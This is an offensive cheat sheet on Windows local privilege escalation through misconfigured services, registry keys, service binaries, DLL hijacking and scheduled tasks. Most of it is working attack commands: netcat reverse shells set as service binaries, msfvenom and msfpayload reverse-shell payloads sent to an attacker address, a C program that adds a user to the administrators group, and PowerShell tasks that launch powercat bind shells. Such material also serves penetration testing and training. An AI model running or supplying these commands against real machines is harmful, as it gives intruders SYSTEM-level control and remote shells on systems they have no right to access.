Services & Scheduled Tasks

Services

# Query one service
sc qc Spooler

# Check permissions
accesschk.exe -ucqv Spooler

C:\> accesschk.exe -uwcqv "Authenticated Users" *
RW SSDPSRV
        SERVICE_ALL_ACCESS
RW upnphost
        SERVICE_ALL_ACCESS

accesschk.exe -ucqv SSDPSRV
accesschk.exe -ucqv upnphost

# Search for specific service (looking for write permissions)
sc qc upnphost

# Following rights can give a SYSTEM shell
SERVICE_CHANGE_CONFIG (Can reconfigure the service binary)
WRITE_DAC (Can reconfigure permissions, leading to 1)
WRITE_OWNER (Can become owner and reconfigure permissions)
GENERIC_WRITE (Inherits SERVICE_CHANGE_CONFIG)
GENERIC_ALL (Inherits SERVICE_CHANGE_CONFIG)

# Exploit a vulnerable service (or adding new user)
sc config upnphost binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost
net start upnphost

# You can use subinacl.exe to check vulnerable service permissions
subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service" /display

# If you have full control over a registry key, you can override it
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.2.60 LPORT=8989 -f exe -o Payload.exe
reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Vulnerable Service" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\testuser\AppData\Local\Temp\Payload.exe" /f
shutdown /r /t 0

# MSF module
exploit/windows/local/service_permissions

# Exploiting service with write permissions
# You want to have (F) or (C) rights
C:\path\to\file.exe 
BUILTIN\Users:F
BUILTIN\Power Users:C 
BUILTIN\Administrators:F 
NT AUTHORITY\SYSTEM:F

# Then you can add your own binary
#include <stdlib.h>
int main ()
{
int i;
    i = system("net localgroup administrators theusername /add");
return 0;
}

# Compile it
i686-w64-mingw32-gcc windows-exp.c -lws2_32 -o exp.exe

# And restart the service
wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]
echo %path%

# Check permissions for a service in PAth
accesschk.exe -dqv "C:\Python27"
cacls "C:\Python27"

# Need to check the IKEEXT service
sc qc IKEEXT

# If all conditions are met, you can craft a shell
msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' O
msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' D > 
/root/Desktop/evil.dll

# Then upload it and rename it
copy evil.dll C:\Python27\wlbsctrl.dll
dir C:\Python27

# Then system reboot

# DLL Hijacking other methods
msf> search -f Vulnerable.exe
msf> download Vulnerable.exe

# You can use procmon to check missing DLL (add Process Name, Result, Name)
# Then 
msf> search -f hijackable.dll

Scheduled Tasks

# Scheduled Tasks
# For example, a TFTP server
Task To Run: E:\GrabLogs\tftp.exe 10.1.1.99 GET log.out E:\GrabLogs\Logs\log.txt

# Check rights for the folder
accesschk.exe -dqv "E:\GrabLogs"
dir "E:\GrabLogs"

# If running as SYSTEM and write permissions for users, you can craft a payload
msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' O
msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' R | msfencode -t
exe > /root/Desktop/evil-tftp.exe

# Then copy payload
copy evil-tftp.exe E:\GrabLogs\tftp.exe
# When executing any of the sysinternals tools for the first time the user will be presented with a GUI
# pop-up to accept the EULA. This is obviously a big problem, however we can add an extra command line flag
# to automatically accept the EULA.
accesschk.exe /accepteula ... ... ...

# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\

# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*

Get Local Privileges back

# From https://itm4n.github.io/localservice-privileges/

# Create a scheduled task
PS> $TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `". C:\TOOLS\powercat.ps1; powercat -l -p 7002 -ep`""
PS> Register-ScheduledTask -Action $TaskAction -TaskName "SomeTask"
PS> Start-ScheduledTask -TaskName "SomeTask"

# Then connect to the bind shell
. .\powercat.ps1
powercat -c 127.0.0.1 -p 7002

---------------

# In order to get the SeImpersonatePrivilege back, you need to specify it clearly
# Create a list of privileges 
[System.String[]]$Privs = "SeAssignPrimaryTokenPrivilege", "SeAuditPrivilege", "SeChangeNotifyPrivilege", "SeCreateGlobalPrivilege", "SeImpersonatePrivilege", "SeIncreaseQuotaPrivilege", "SeShutdownPrivilege", "SeUndockPrivilege", "SeIncreaseWorkingSetPrivilege", "SeTimeZonePrivilege"

# Create a Principal for the task 
$TaskPrincipal = New-ScheduledTaskPrincipal -UserId "LOCALSERVICE" -LogonType ServiceAccount -RequiredPrivilege $Privs

# Create an action for the task 
$TaskAction = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-Exec Bypass -Command `". C:\TOOLS\powercat.ps1; powercat -l -p 7003 -ep`""
# Create the task
Register-ScheduledTask -Action $TaskAction -TaskName "SomeTask2" -Principal $TaskPrincipal
# Start the task
Start-ScheduledTask -TaskName "SomeTask2"